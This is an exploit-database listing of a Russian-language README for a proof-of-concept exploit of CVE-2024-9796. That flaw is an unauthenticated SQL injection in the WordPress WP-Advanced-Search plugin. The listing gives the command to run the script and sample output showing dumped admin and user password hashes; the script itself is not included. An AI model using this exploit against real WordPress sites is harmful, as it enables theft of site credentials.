Sploitus

Exploit for CVE-2024-9796

kitploit · 2026-08-31

Exploit Code

MARKDOWN33 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BWITHE-CVE-2024-9796
# CVE-2024-9796 WP-Advanced-Search < 3.3.9.2 - Неаутентифицированная SQL-инъекция

## Описание

PoC SQL-инъекция сольёт пользователей WordPress и хэши.

## Отказ от ответственности:

Этот скрипт предназначен только для образовательных целей.

Не используйте его в незаконных целях.

Если вы это сделаете, вся ответственность ложится на вас; я не несу ответственности за любое неправомерное использование.

## Дополнительная информация об эксплойте

https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/

## Использование:

root@kitploit:~
    
    
    # Successful attempt
    python3 poc.py -i 127.0.0.1
    [!] 127.0.0.1 has been PWNed!
    admin:$P$H5blBNpO5AVI7eDJJi95E6pso16h981
    user:$P$H1Sa1pcnzwWha3G9XH5rkfB6wOcE2a1
    
    # unsuccessful attempt
    python3 poc.py -i 127.0.0.1
    [!] Doesn't look vulnerable..